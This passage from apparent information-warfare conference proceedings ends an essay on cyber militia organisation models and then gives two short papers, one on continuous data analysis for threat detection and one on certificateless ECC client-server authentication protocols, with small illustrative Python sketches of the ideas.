Cell. In the case of short conflicts, this puts the Hierarchy model at a disadvantage.<br />
Then again, the Hierarchy model is more likely to adopt a “peace time” mission of training and<br />
recruitment in addition to the “conflict” mission, while the other two options are more likely to be<br />
mobilized only in time of conflict. This can offset the Hierarchy’s slow initial formation, provided that<br />
the Hierarchy is established well before the conflict.<br />
While the Forum can rely on its numbers and use relatively primitive attacks, the Cell is capable of<br />
more sophisticated attacks due to its members’ experience. The cyber attack capabilities of the Hierarchy,<br />
however, can range from trivial to complex.<br />
It is important to note that the three options covered here can be combined in many ways, depending<br />
on the underlying circumstances and the personalities involved.<br />
6. Conclusion<br />
Politically motivated cyber attacks are becoming more frequent every year. In most cases, these cyber<br />
conflicts involve offensive non-state actors (often spontaneously) formed from volunteers. Therefore, it is<br />
important to study these groups.<br />
I have provided a theoretical way to categorize non-trivial cyber militias based on their organization.<br />
The three theoretical models are: the Forum, the Cell and the Hierarchy. In reality, one is unlikely to see<br />
a pure form of any of these, as different groups can include aspects of several models. However, the<br />
strengths and weaknesses identified should serve as useful guides to dealing with the cyber militia<br />
threat.<br />
Disclaimer: The opinions expressed here should not be interpreted as the official policy of the<br />
Cooperative Cyber Defence Centre of Excellence or the North Atlantic Treaty Organization.<br />
References<br />
Carr, J. (2009) Inside Cyber Warfare. Sebastopol: O'Reilly Media.<br />
Denning, D. E. (2010) “Cyber Conflict as an Emergent Social Phenomenon.” In Holt, T. & Schell, B. (Eds.)<br />
Corporate Hacking and Technology-Driven Crime: Social Dynamics and Implications. IGI Global, pp 170-<br />
186.<br />
Krekel, B., DeWeese, S., Bakos, G., Barnett, C. (2009) Capability of the People’s Republic of China to Conduct<br />
Cyber Warfare and Computer Network Exploitation. Report for the US-China Economic and Security<br />
Review Commission.<br />
Nazario, J. (2009) “Politically Motivated Denial of Service Attacks.” In Czosseck, C. & Geers, K. (Eds.) The Virtual<br />
Battlefield: Perspectives on Cyber Warfare. Amsterdam: IOS Press, pp 163-181.<br />
Ottis, R. (2008) “Analysis of the 2007 Cyber Attacks Against Estonia from the Information Warfare Perspective.”<br />
In Proceedings of the 7th <strong>European</strong> <strong>Conference</strong> on Information Warfare and Security. Reading: <strong>Academic</strong><br />
Publishing Limited, pp 163-168.<br />
Ottis, R. (2009) “Theoretical Model for Creating a Nation-State Level Offensive Cyber Capability.” In Proceedings<br />
of the 8th <strong>European</strong> <strong>Conference</strong> on Information Warfare and Security. Reading: <strong>Academic</strong> Publishing<br />
Limited, pp 177-182.<br />
Ottis, R. (2010a) “From Pitch Forks to Laptops: Volunteers in Cyber Conflicts.” In Czosseck, C. and Podins, K.<br />
(Eds.) <strong>Conference</strong> on Cyber Conflict. Proceedings 2010. Tallinn: CCD COE Publications, pp 97-109.<br />
Ottis, R. (2010b) “Proactive Defence Tactics Against On-Line Cyber Militia.” In Proceedings of the 9th <strong>European</strong><br />
<strong>Conference</strong> on Information Warfare and Security. Reading: <strong>Academic</strong> Publishing Limited, pp 233-237.<br />
Williams, G., Arreymbi, J. (2007) “Is Cyber Tribalism Winning Online Information Warfare?” In Proceedings of<br />
ISSE/SECURE 2007 Securing Electronic Business Processes. Wiesbaden: Vieweg. On-line:<br />
http://www.springerlink.com/content/t2824n02g54552m5/n<br />
Young, S., Aitel, D. (2004) The Hacker’s Handbook. The Strategy behind Breaking into and Defending Networks.<br />
Boca Raton: Auerbach.<br />
Work in Progress Papers<br />
Large-Scale Analysis of Continuous Data in Cyber-Warfare<br />
Threat Detection<br />
William Acosta<br />
University of Toledo, USA<br />
william.acosta@utoledo.edu<br />
Abstract: Combating cyber/information warfare threats requires analyzing vast quantities of diverse data. The<br />
data required to detect attacks as they occur (on-line analysis of live data) and predict future threats (forensic<br />
analysis/data mining) is not only large, but is growing at a staggering rate. Data such as network traffic logs,<br />
emails, social networking posts, SMS messages, and cell phone call logs are, by nature, continuous and<br />
growing. The problem addressed in this research is that current systems are not designed to handle either the<br />
scope or nature of the analysis or the data itself. For example, distributed data processing systems like Google’s<br />
Map-Reduce provide the ability to process large data sets, but they are not designed to easily support processing<br />
of changing data sets or data-mining algorithms. In light of this, Google has itself recently stopped using<br />
MapReduce for building its web-index, opting instead for a custom mechanism that can more quickly respond to<br />
and process new content. Non-traditional databases, like vertically-partitioned/column-store databases, can<br />
efficiently support analysis algorithms on large quantities of data, but they are not designed to support<br />
continuously changing data sets. The goal of this research is to explore and design a new data management<br />
system that can handle large quantities of incrementally growing data, with direct support for data mining<br />
and analysis algorithms. Specifically, this research proposes a new distributed data processing system that<br />
exploits the parallel and distributed resources/computation of cloud computing infrastructures. It makes use of<br />
summary data structures that can be updated incrementally and continuous queries to support analysis and data<br />
mining algorithms natively. This approach allows for larger-scale and more robust analysis on continuously<br />
growing data that can help detect, predict and respond to cyber-warfare threats.<br />
Keywords: data-mining, databases, text-search, cloud computing, data integration<br />
1. Introduction<br />
Protection against cyber/information warfare threats requires understanding the nature, methods, and<br />
patterns of those attacks. Such understanding can allow for early detection and, possibly, prediction<br />
of attacks. Gaining an understanding of the patterns and mechanisms used in cyber/information<br />
warfare attacks requires analyzing large amounts of diverse data such as server logs (Myers et al.<br />
2010), emails, SMS messages, and social-networking data. Not only is the data diverse, but it is also<br />
continuous; new data gets generated every day. Furthermore, analysis of this data can require<br />
equally diverse approaches: graph-theoretic algorithms (detecting patterns in social-networking), data<br />
mining algorithms (associations between events), statistical models, clustering algorithms, etc. The<br />
diverse nature of the data and analysis algorithms as well as the large quantity of data to be analyzed<br />
poses problems to both traditional databases and storage systems. In order to provide the analysis of<br />
diverse and continuous data required for cyber-warfare threat detection, a new system is needed for<br />
managing large quantities of diverse data that can support equally diverse analysis algorithms.<br />
The need to incrementally process large quantities of data is applicable to a wide range of applications.
For example, Google replaced MapReduce (Dean & Ghemawat 2004), its previous web-indexing
system, in order to enable faster updates of its index (Metz 2010, Peng & Dabek 2010). Similarly,
detecting and responding to information security threats requires a mechanism that can not only
manage large quantities of data, but also provide fast response times for complex, continuous
analysis. This paper proposes a new distributed data-analysis framework that is designed to meet the<br />
needs of applications that require analysis of continuous data. Next, Section 2 presents the design of<br />
the proposed system in the context of related work. Section 3 then provides concluding remarks.<br />
2. Design and requirements of a continuous data analysis system<br />
Cyber-warfare threat detection requires analyzing large quantities of diverse data that is continuously<br />
generated. The properties of the raw data in this type of application impose some constraints on the<br />
analysis and data storage systems. These applications require analyzing not only current data, but<br />
also prior/historical data from many heterogeneous sources. Because the raw data is continuously
generated, old data must be kept for analysis while new data is integrated into the storage and<br />
analysis framework. Because old data must be kept and not changed, the system need not support<br />
updates of raw data. Effectively, raw data is append-only. This can be leveraged to improve storage<br />
efficiency and performance; it is easier to implement and support distributed storage as no
write-locking of existing data is necessary. It also allows the analysis framework to make use of novel
summary data structures and algorithms that can incorporate the changes made to the data without<br />
requiring analysis of the full dataset.<br />
2.1 Storage and data management<br />
The large quantity of data makes a centralized storage solution infeasible; instead, a distributed
storage solution is favored. The parallel nature of many of the algorithms makes a distributed solution
not only more feasible, but also desirable. Distributed storage systems such as Google’s BigTable<br />
(Chang et al. 2006), Yahoo’s PNUTS (Cooper et al. 2008), and Amazon’s Dynamo (DeCandia et al.<br />
2007) provide the low-level mechanisms for storing and managing large quantities of data. These
systems were designed to support coordinated reads and updates of data in a distributed<br />
environment. To support the needs of applications like cyber-warfare threat detection, a distributed<br />
storage system should provide efficient, low-level support for append-only writes of raw data, as well<br />
as efficient tracking of incremental additions and updates of the dataset.<br />
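The append-only writes and incremental tracking described above can be sketched in a few lines. The following toy Python class is a hypothetical illustration (not part of BigTable, PNUTS or Dynamo): offsets serve as a high-water mark, so an analysis job can pick up only the records added since its last run.

```python
# Illustrative sketch (hypothetical, not the paper's system): an
# append-only event log with offset-based tracking of additions.
class AppendOnlyLog:
    def __init__(self):
        self._records = []          # raw data is never updated in place

    def append(self, record):
        """Append-only write: no locking of existing data is needed."""
        self._records.append(record)
        return len(self._records) - 1   # offset of the new record

    def read_since(self, offset):
        """Return records added after `offset`, plus the new high-water mark."""
        return self._records[offset:], len(self._records)

log = AppendOnlyLog()
log.append({"src": "10.0.0.5", "event": "login_fail"})
log.append({"src": "10.0.0.7", "event": "login_ok"})

batch, mark = log.read_since(0)      # first incremental pass sees both
assert len(batch) == 2

log.append({"src": "10.0.0.5", "event": "login_fail"})
batch, mark = log.read_since(mark)   # next pass sees only the new record
assert len(batch) == 1
```

Because records are immutable once written, readers never need coordination with writers beyond the single offset counter.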
2.2 Distributed processing of data<br />
Recently, there has been a great deal of research on Google’s MapReduce (Dean & Ghemawat 2004)
distributed computing software framework for processing large datasets. However, its batch-oriented
design cannot deal with incremental or continuous data updates. This makes it
unsuitable for a variety of applications including cyber-warfare threat analysis and detection. Systems<br />
like Haloop (Bu et al. 2010) and MapReduce Online (Condie et al. 2010) have sought to add<br />
continuous query support to MapReduce. To achieve this, these systems had to make fundamental<br />
changes to the API and underlying architecture of MapReduce. This paper argues that what is<br />
needed instead is a system designed from the ground-up to support the demands of analysis and<br />
mining algorithms on large sets of continuously generated data.<br />
2.3 Data management and analysis<br />
The problem of analyzing continuous data has been explored by stream databases (Abadi et al. 2005,<br />
Shah et al. 2004). Similarly, continuous queries in databases have been proposed with systems such<br />
as TelegraphCQ (Chandrasekaran et al. 2003) and CQL (Arasu et al. 2006). These systems can<br />
handle processing queries on streams of data with long-running/continuous queries. However, they<br />
lack the ability to support analytic algorithms over a large and diverse dataset. In contrast,
vertically-partitioned databases such as C-Store (Stonebraker et al. 2005) excel at fast and efficient support of
complex analytics. Unfortunately, vertically-partitioned databases suffer from poor performance on<br />
writes. In essence, insertions and updates require that the index be rebuilt. Although performance of<br />
reads is very fast once the index is built, building the index is very expensive. What is needed is a<br />
system that can perform complex analytics on continuous data without requiring a complex index to<br />
be completely rebuilt as a result of data updates. This paper proposes a new, incremental indexing
system that keeps track of summarized historical data while allowing many small, incremental
updates to be incorporated. The key difference is that, unlike traditional database indexes, the new
incremental index would not be built off-line (as a batch process). Instead, the index would incorporate the
many incremental updates on-line so that the index of past data is always active and valid.
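A minimal illustration of such on-line incremental indexing (a hypothetical sketch, not the proposed system itself) is an inverted index whose postings are updated in place as each new record arrives, so no batch rebuild is ever required:

```python
from collections import defaultdict

class IncrementalIndex:
    """Toy inverted index: each new document is folded into the existing
    postings on-line, so the index of past data stays active and valid."""
    def __init__(self):
        self.postings = defaultdict(set)   # term -> set of doc ids

    def add(self, doc_id, text):
        # A small in-place update per document; no off-line rebuild.
        for term in text.lower().split():
            self.postings[term].add(doc_id)

    def lookup(self, term):
        return self.postings.get(term.lower(), set())

idx = IncrementalIndex()
idx.add("log1", "failed login from host A")
assert idx.lookup("login") == {"log1"}
idx.add("log2", "login accepted for host B")   # incremental update
assert idx.lookup("login") == {"log1", "log2"}  # past data still queryable
```

A production system would of course persist and distribute the postings, but the key property (queries remain valid between small updates) is the same.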
In addition to the storage and distributed computing framework, it is also important to consider the<br />
needs of the algorithms that will be used in the system. Applications with such diverse data require<br />
equally diverse analysis. For example, detecting hidden correlations and associations between events<br />
seen in server logs requires mining association rules (Agrawal & Srikant 1994) whereas detecting<br />
interaction of attackers in a network may involve graph theoretic algorithms.<br />
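For instance, mining simple association rules over server-log events reduces to counting support and confidence. The sessions, event names and thresholds below are hypothetical, and the pair-counting is a simplification of full Apriori (Agrawal & Srikant 1994):

```python
from itertools import combinations
from collections import Counter

# Each "transaction" is the set of event types seen in one log session
# (hypothetical data for illustration).
sessions = [
    {"port_scan", "login_fail", "login_ok"},
    {"port_scan", "login_fail"},
    {"login_ok"},
    {"port_scan", "login_fail", "priv_esc"},
]

def frequent_pairs(transactions, min_support):
    """Support of every event pair, kept if it meets min_support."""
    counts = Counter()
    for t in transactions:
        for pair in combinations(sorted(t), 2):
            counts[pair] += 1
    n = len(transactions)
    return {p: c / n for p, c in counts.items() if c / n >= min_support}

def confidence(transactions, lhs, rhs):
    """P(rhs in session | lhs in session)."""
    lhs_n = sum(1 for t in transactions if lhs in t)
    both = sum(1 for t in transactions if lhs in t and rhs in t)
    return both / lhs_n

pairs = frequent_pairs(sessions, min_support=0.5)
assert ("login_fail", "port_scan") in pairs            # support 3/4
assert confidence(sessions, "port_scan", "login_fail") == 1.0
```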
3. Conclusion<br />
This paper presents a case for a new distributed computing system that is explicitly designed to meet<br />
the unique needs of applications such as cyber-warfare threat detection. The system should support<br />
large quantities of diverse data such as server logs, emails, social-network data, etc. It should allow<br />
for a variety of mining and analysis algorithms and support for those algorithms to be processed in a<br />
parallel and distributed manner. The system must not only meet these needs, but also do so in a way<br />
that can efficiently support continuous analysis of data that is continuously generated.<br />
References<br />
William Acosta<br />
Abadi, D. J., Ahmad, Y., Balazinska, M., Cherniack, M., Hwang, J.-H., Lindner, W., Maskey, A. S., Rasin, A.,<br />
Ryvkina, E., Tatbul, N., Xing, Y. & Zdonik, S. (2005), The design of the borealis stream processing engine,<br />
in ‘CIDR ’05: Proceedings of the second biennial <strong>Conference</strong> on Innovative Data Systems Research’, pp.<br />
277–289.<br />
Agrawal, R. & Srikant, R. (1994), Fast algorithms for mining association rules, in J. B. Bocca, M. Jarke & C.<br />
Zaniolo, eds, ‘Proc. 20th Int. Conf. Very Large Data Bases, VLDB’, Morgan Kaufmann, pp. 487–499.<br />
Arasu, A., Babu, S. & Widom, J. (2006), ‘The CQL continuous query language: semantic foundations and query<br />
execution’, The VLDB Journal 15(2), 121–142.<br />
Bu, Y., Howe, B., Balazinska, M. & Ernst, M. D. (2010), Haloop: Efficient iterative data processing on large<br />
clusters, in ‘Proceedings of the VLDB Endowment’, Vol. 3.<br />
Chandrasekaran, S., Cooper, O., Deshpande, A., Franklin, M. J., Hellerstein, J. M., Hong, W., Krishnamurthy, S.,<br />
Madden, S., Raman, V., Reiss, F. & Shah, M. (2003), Telegraphcq: Continuous dataflow processing for an<br />
uncertain world, in ‘CIDR ’03: Proceedings of the first biennial <strong>Conference</strong> on Innovative Data Systems<br />
Research’.<br />
Chang, F., Dean, J., Ghemawat, S., Hsieh, W. C., Wallach, D. A., Burrows, M., Chandra, T., Fikes, A. & Gruber,<br />
R. E. (2006), Bigtable: A distributed storage system for structured data, in ‘Proceedings of the 7th<br />
symposium on Operating systems design and implementation (OSDI ’06)’, Seattle, WA.<br />
Condie, T., Conway, N., Alvaro, P., Elmeleegy, J. M. H. K. & Sears, R. (2010), Mapreduce online, in<br />
‘Proceedings of the Seventh USENIX Symposium on Networked System Design and Implementation (NSDI<br />
2010)’, San Jose, CA.<br />
Cooper, B. F., Ramakrishnan, R., Srivastava, U., Silberstein, A., Bohannon, P., Jacobsen, H.-A., Puz, N.,<br />
Weaver, D. & Yerneni, R. (2008), PNUTS: Yahoo!’s hosted data serving platform, in ‘Proceedings of the 34th<br />
International <strong>Conference</strong> on Very Large Data Bases (VLDB ’08)’, Auckland, New Zealand.<br />
Dean, J. & Ghemawat, S. (2004), Mapreduce: simplified data processing on large clusters, in ‘OSDI’04:<br />
Proceedings of the <strong>6th</strong> conference on Symposium on Operating Systems Design & Implementation’,<br />
USENIX Association, Berkeley, CA, USA, pp. 10–10.<br />
DeCandia, G., Hastorun, D., Jampani, M., Kakulapati, G., Lakshman, A., Pilchin, A., Sivasubramanian, S.,<br />
Vosshall, P. & Vogels, W. (2007), Dynamo: amazon’s highly available key-value store, in ‘SOSP ’07:<br />
Proceedings of twenty-first ACM SIGOPS symposium on Operating systems principles’, ACM, New York,<br />
NY, USA, pp. 205–220.<br />
Metz, C. (2010), ‘Google search index splits with mapreduce’. URL: http://www.theregister.co.uk/2010/09/09/google_caffeine_explained/<br />
Myers, J., Grimaila, M. & Mills, R. (2010), Insider threat detection using distributed event correlation of web<br />
server logs, in ‘ICIW ’10: Proceedings of the 5th International <strong>Conference</strong> on Information-Warfare and<br />
Security’.<br />
Peng, D. & Dabek, F. (2010), Large-scale incremental processing using distributed transactions and notifications,<br />
in ‘OSDI ’10: Proceedings of the Ninth USENIX Symposium on Operating Systems Design and<br />
Implementation’.<br />
Shah, M. A., Hellerstein, J. M. & Brewer, E. (2004), Highly available, fault-tolerant, parallel dataflows, in<br />
‘SIGMOD ’04: Proceedings of the 2004 ACM SIGMOD international conference on Management of data’,<br />
ACM, New York, NY, USA, pp. 827–838.<br />
Stonebraker, M., Abadi, D. J., Batkin, A., Chen, X., Cherniack, M., Ferreira, M., Lau, E., Lin, A., Madden, S.,<br />
O’Neil, E., O’Neil, P., Rasin, A., Tran, N. & Zdonik, S. (2005), C-store: a column-oriented dbms, in ‘VLDB<br />
’05: Proceedings of the 31st international conference on Very large data bases’, VLDB Endowment, pp.<br />
553–564.<br />
A System and Method for Designing Secure Client-Server<br />
Communication Protocols Based on Certificateless PKI<br />
Natarajan Vijayarangan<br />
Tata Consultancy Services Limited (TCS), Chennai, India<br />
n.vijayarangan@tcs.com<br />
Abstract: Client-server networking is a distributed application architecture that partitions tasks or work loads<br />
between service providers (servers) and service requesters (clients), where the network communication is not<br />
necessarily secure. A number of researchers and organizations have produced innovative methods to ensure a<br />
secure communication in the client-server set up. In this paper, however, TCS brings out a system of novel<br />
network security protocols for generic purposes. Let us take a brief look at the history of client-server<br />
communication. In 1993 Bellovin and Merritt patented strong Password-Authenticated Key Exchange<br />
(PAKE), an interactive method for two or more parties to establish cryptographic keys based on one or more<br />
party's knowledge of a password. Later, Stanford University patented the Secure Remote Password (SRP) protocol,<br />
a new password authentication and key-exchange mechanism over an untrusted network. Then Sun Microsystems<br />
implemented Elliptic Curve Cryptography (ECC) technology, which is well integrated into the OpenSSL<br />
Certificate Authority. This code enables secure TLS/SSL handshakes using elliptic-curve-based cipher suites.<br />
In this paper, we propose a set of client-server communication protocols using certificateless Public Key<br />
Infrastructure (PKI) based on ECC. The protocols provide identity-based authentication without using bilinear<br />
maps, session-key exchange and secure message transfer. Moreover, we show that the protocols are<br />
lightweight and are designed to serve multiple applications.<br />
Keywords: certificateless public key cryptography, elliptic curve cryptography, Jacobi identity, message<br />
preprocessing, Lie algebras, challenge-response<br />
1. Introduction<br />
In existing network operating systems, communication between the client and server takes place<br />
using File Transfer Protocol (FTP), which is not a secure medium. The more secure medium for<br />
communication, Hypertext Transfer Protocol Secure (HTTPS), ensures the security of the connection,<br />
but not of the messages themselves. For instance, users accessing content with a set-top box unit<br />
may face problems such as data loss and content modification. TCS has designed a set of novel network security<br />
protocols to avoid these issues and ensure robust communication between the client and server.<br />
Theoretically and practically, the proposed protocols have been analyzed and shown to be<br />
secure against replay and rushing attacks. In this design, the certificateless PKI concept based on<br />
ECC (Al-Riyami and Paterson 2003, Hankerson et al 2004) is introduced to strengthen the protocols.<br />
TCS has filed a patent application for this invention.<br />
2. Objectives of the invention<br />
The objectives of the invention are to provide: 1) secure communication between client and server,<br />
2) a robust, tamper-proof and lightweight authentication mechanism, 3) non-repudiation for clients, and<br />
4) no password-based negotiation between client and server.<br />
3. Overview of the invention<br />
In existing network security protocols, certificate-based public key cryptography and identity-based<br />
cryptography (Shamir 1984) have been widely used. These crypto methods face the costly and complex<br />
key-management problem and the key-escrow problem in real-life deployments. A few years ago,<br />
Certificateless Public Key Cryptography (CL-PKC) was introduced to address these problems, though they<br />
have not been fully solved. Sometimes, CL-PKC uses bilinear pairings and inverse<br />
operations, which slow down the performance of the authentication process.<br />
TCS' new approach towards the network security protocols will solve the common problems between<br />
customers and network service providers or agents. Many researchers and organizations have<br />
developed innovative client-server communication protocols based on certificates which require a lot<br />
of computation, power consumption and memory space. TCS has designed a lightweight protocol that<br />
will overcome these issues.<br />
TCS has introduced CL-PKC with no bilinear pairings in the proposed set of network security<br />
protocols. These protocols are efficient and effective against common attacks and have applications<br />
in client-server set up over Transmission Control Protocol and User Datagram Protocol networks,<br />
set-top box units and telecommunication. The three different Network Security Protocols (NSP 1, 2<br />
and 3) that TCS has developed are explained in the following sections.<br />
4. Description of NSP 1<br />
TCS has designed a network security protocol in a generic manner to ensure secure communication<br />
between client and server. This protocol initially allows the server to act as a Key Generation Center<br />
(KGC) for distributing public and private keys to clients. Later, every client has to generate a pair of<br />
public and private keys for authentication and session key generation. No certificate is exchanged in<br />
this protocol. Robust and well-proven algorithms, ECDSA (Elliptic Curve Digital Signature Algorithm)<br />
and ECDH (Elliptic Curve Diffie-Hellman) Key Exchange (Certicom Research 2000), are used in this<br />
protocol for authentication and session key generation respectively.<br />
Following is the workflow of NSP1:<br />
(Pre-Shared Key Mechanism) Every client has a pair of Public and Private keys generated by the<br />
server which acts as a Key Generation Center (KGC).<br />
Client initiates the communication to server by sending a message ‘Client Hello!’.<br />
Server generates Random Challenge (RC) of n-bits using Pseudo Random Number Generator<br />
(PRNG). Further, Server encrypts RC with client's public key using Elliptic Curve Encryption<br />
(ECE) method.<br />
Client decrypts the encrypted RC with its private key using ECE.<br />
Client generates Public and Private keys on NIST Elliptic curve-256 / 384 /512. Client signs the<br />
challenge and sends the signature to Server.<br />
Server verifies the signature and generates a key pair on the SAME curve. Server sends its public<br />
key to Client.<br />
Client and server negotiate an m-bit shared secret key using ECDH algorithm.<br />
Client and server have Session key of m bits for Encryption. Client and server have a cipher suite.<br />
A secure communication is established between Client and Server.<br />
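The ECDH negotiation in the final steps of the workflow can be illustrated at toy scale. The sketch below runs Diffie-Hellman key agreement on a small textbook curve (y² = x³ + 2x + 2 over GF(17), generator (5, 1), group order 19); a real deployment of NSP 1 would use the NIST curves named above through a vetted cryptographic library, and the private keys here are arbitrary toy values:

```python
# Toy ECDH sketch: both parties derive the same shared point.
P, A = 17, 2                       # field prime and curve coefficient a
G = (5, 1)                         # generator on y^2 = x^3 + 2x + 2 mod 17

def ec_add(p1, p2):
    """Elliptic-curve point addition (None = point at infinity)."""
    if p1 is None: return p2
    if p2 is None: return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:                   # doubling: tangent slope
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:                          # addition: chord slope
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)

def ec_mul(k, point):
    """Scalar multiplication by double-and-add."""
    result, addend = None, point
    while k:
        if k & 1:
            result = ec_add(result, addend)
        addend = ec_add(addend, addend)
        k >>= 1
    return result

client_priv, server_priv = 3, 7            # toy-sized private keys
client_pub = ec_mul(client_priv, G)        # exchanged over the channel
server_pub = ec_mul(server_priv, G)

# Both sides compute the same shared point -> m-bit session key material.
assert ec_mul(client_priv, server_pub) == ec_mul(server_priv, client_pub)
```

The shared point would then be hashed into the m-bit session key mentioned in the workflow; signing the challenge (ECDSA) is a separate step not shown here.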
5. Description of NSP 2<br />
For network security protocol 2, there is no initial setup for generating a pair of public and private keys for<br />
client and server. Instead, the client and the server share a unique Message Preprocessing (MP)<br />
function (Vijayarangan 2009), a bijective mapping, which helps ensure that no modification has taken place<br />
when a random challenge is sent in the clear. As part of the communication setup, each client<br />
receives a unique MP function and ID (an identity number of the client) supplied by the server. An MP<br />
algorithm (consisting of three sequential operations: shuffling, a T-function and an LFSR) converts a<br />
message into a randomized message. Analysis indicates that, thanks to the MP function,<br />
NSP 2 fares better than NSP 1 if an attacker predicts RC values during the<br />
communication.<br />
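To illustrate the bijective property of an MP function, the toy sketch below composes two invertible stages: a fixed byte shuffle and an XOR with an LFSR keystream. The actual MP of (Vijayarangan 2009) also includes a T-function stage; the permutation, LFSR taps and seed here are arbitrary illustrative choices:

```python
# Toy invertible MP sketch (simplified: shuffle + LFSR mask only).
PERM = [3, 0, 2, 1]                          # fixed shuffle for 4-byte blocks
INV_PERM = [PERM.index(i) for i in range(len(PERM))]

def lfsr_stream(n, state=0xACE1):
    """Keystream bytes from a 16-bit Fibonacci LFSR (taps 16,14,13,11)."""
    out = []
    for _ in range(n):
        bit = (state ^ (state >> 2) ^ (state >> 3) ^ (state >> 5)) & 1
        state = (state >> 1) | (bit << 15)
        out.append(state & 0xFF)
    return out

def mp(block):
    """MP: shuffle the bytes, then XOR with the LFSR keystream."""
    shuffled = bytes(block[i] for i in PERM)
    return bytes(b ^ k for b, k in zip(shuffled, lfsr_stream(len(block))))

def mp_inv(block):
    """MP^-1: undo the XOR, then undo the shuffle."""
    unmasked = bytes(b ^ k for b, k in zip(block, lfsr_stream(len(block))))
    return bytes(unmasked[i] for i in INV_PERM)

rc = b"\x12\x34\x56\x78"                     # a random challenge RC
assert mp_inv(mp(rc)) == rc                  # MP is invertible (bijective)
assert mp(rc) != mp(b"\x12\x34\x56\x79")     # distinct RCs give distinct MP(RC)
```

Because each stage is a bijection, so is their composition, which is the property the protocol relies on: an attacker who alters RC cannot produce a matching MP(RC).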
Following is the workflow of NSP 2:<br />
Client initiates the communication to server by sending a message ‘Client Hello!’.<br />
Server generates Random Challenge (RC) of n-bits using Pseudo Random Number Generator<br />
(PRNG) and computes the message preprocessing of RC. Client receives the RC and MP(RC). It<br />
verifies MP(RC).<br />
Client generates Public and Private keys on NIST Elliptic curve-256 / 384 / 512. Client signs the<br />
message = {RC || ID} and sends the signature with its public key and MP(public key) to Server.<br />
Server verifies the signature and generates a key pair on the SAME curve. Server sends its public<br />
key to Client.<br />
Client and Server negotiate an m-bit shared secret key using ECDH algorithm.<br />
Client and Server have Session key of m bits for Encryption. Client and Server have a cipher<br />
suite.<br />
A secure communication is established between Client and Server.<br />
6. Description of NSP 3<br />
NSP 3 is similar to network security protocol 1; the difference lies in signature generation. The<br />
client uses the Jacobi identity, a special product on Lie algebras, to authenticate the server. The Jacobi<br />
identity (Jacobson 1979) operates on a random challenge RC = x || y || z (divided into three parts, i.e.,<br />
trifurcated) and satisfies the relationship [[x,y],z] + [[y,z],x] + [[z,x],y] = 0. Note that the Lie<br />
product (Lie bracket) has a special property: [x, y] = -[y, x].<br />
Following is the workflow of NSP 3:<br />
(Pre-Shared Key Mechanism) Every client has a pair of Public and Private keys generated by the<br />
server which acts as a Key Generation Center (KGC).<br />
Client initiates the communication to server by sending a message ‘Client Hello!’.<br />
Server generates Random challenge (RC) of n-bits using Pseudo Random Number Generator<br />
(PRNG). Further, Server encrypts RC with client's public key using Elliptic Curve Encryption<br />
(ECE) method.<br />
Client decrypts the encrypted RC with its private key using ECE.<br />
Client computes the Jacobi identity on RC = x||y||z and sends the Lie product [[x,y],z] to server.<br />
Server verifies the relationship [[x,y],z] + [[y,z],x] + [[z,x],y] = 0. Server sends its public key using<br />
ECC to Client.<br />
Client and server negotiate an m-bit shared secret key using ECDH algorithm.<br />
Client and server have Session key of m bits for Encryption. Client and server have a cipher suite.<br />
A secure communication is established between Client and Server.<br />
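The server-side verification of the Jacobi identity can be demonstrated with any Lie algebra. The sketch below uses 2x2 matrices with the commutator [x, y] = xy - yx as the Lie bracket; this is an illustrative choice, since the paper does not fix a particular algebra, and the matrices standing in for the trifurcated RC are arbitrary:

```python
# Checking [[x,y],z] + [[y,z],x] + [[z,x],y] = 0 with matrix commutators.
def mat_mul(a, b):
    return [[sum(a[i][k] * b[k][j] for k in range(2)) for j in range(2)]
            for i in range(2)]

def mat_sub(a, b):
    return [[a[i][j] - b[i][j] for j in range(2)] for i in range(2)]

def mat_add(a, b):
    return [[a[i][j] + b[i][j] for j in range(2)] for i in range(2)]

def bracket(x, y):
    """Lie bracket [x, y] = xy - yx; note [x, y] = -[y, x]."""
    return mat_sub(mat_mul(x, y), mat_mul(y, x))

# Stand-ins for the trifurcated challenge RC = x || y || z.
x = [[1, 2], [3, 4]]
y = [[0, 1], [1, 0]]
z = [[2, 0], [0, 3]]

total = mat_add(mat_add(bracket(bracket(x, y), z),
                        bracket(bracket(y, z), x)),
                bracket(bracket(z, x), y))
assert total == [[0, 0], [0, 0]]   # the Jacobi identity holds
```

The identity holds for every commutator of an associative algebra, which is why a tampered Lie product fails the server's check, and why the degenerate Abelian case ([x,y] = 0 everywhere) must be excluded.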
7. Analysis<br />
The proposed network security protocols resist replay and rushing attacks. An attacker cannot<br />
guess a random challenge (RC) in NSP 1, since it traverses in an encrypted form. It is safe to use<br />
NSP 1 in different nodes/channels.<br />
NSP 2 differs from NSP 1 in that it sends RC in the clear together with MP(RC). The bijective<br />
property of MP means that an attacker can change RC, but not MP(RC). Given<br />
two distinct random challenges RC1 and RC2, MP(RC1) is not the same as MP(RC2). If the attacker<br />
tries to insert another random challenge, then the server can detect this fraud by verifying the client's<br />
signature. Since the MP function's shuffling, T-function and LFSR operations are invertible<br />
(Vijayarangan and Vijayasarathy 2005, Vijayarangan 2009), the inverse operations MP^-1{MP(RC1)}<br />
and MP^-1{MP(RC2)} are performed through a primitive polynomial of the LFSR, the inverse T-function<br />
and de-shuffling, and their values RC1 and RC2 must be distinct.<br />
In NSP 3, the server will not satisfy the Jacobi identity if an attacker changes RC. The rationale behind<br />
using the Jacobi identity is that a Lie product computed on RC at the client end must match at the server.<br />
The server checks the Jacobi identity and thereby ensures that the same client has sent the Lie product. If<br />
the attacker alters a Lie product, then the server can detect this fraud by verifying the Jacobi identity. Note<br />
that Abelian Lie algebras (for every x and y, [x,y] = 0) should not be used.<br />
From the above protocols, we can propose that dishonest clients can be eliminated in a<br />
Mesh Topology Network (MTN) based on NSP 1, 2 and 3. Thus, a system of protocols 1, 2 and 3 can be<br />
plugged into an MTN to bring out a strong and secure network.<br />
The proposed Mesh Topology Network (MTN), illustrated in Figure 1, is an integrated network in which all<br />
the protocols (NSP 1, 2 and 3) are connected to each other. In the topology, every protocol is<br />
connected to the other protocols on the network through hops, and each protocol itself acts as a node<br />
(mote). Some are connected through single-hop networks and some may be connected through more<br />
than one hop. The mesh network is designed to be continuously connected: even if one node fails, the<br />
network finds an alternate route to transfer the data.<br />
Figure 1: A cluster of network security protocols supporting MTN<br />
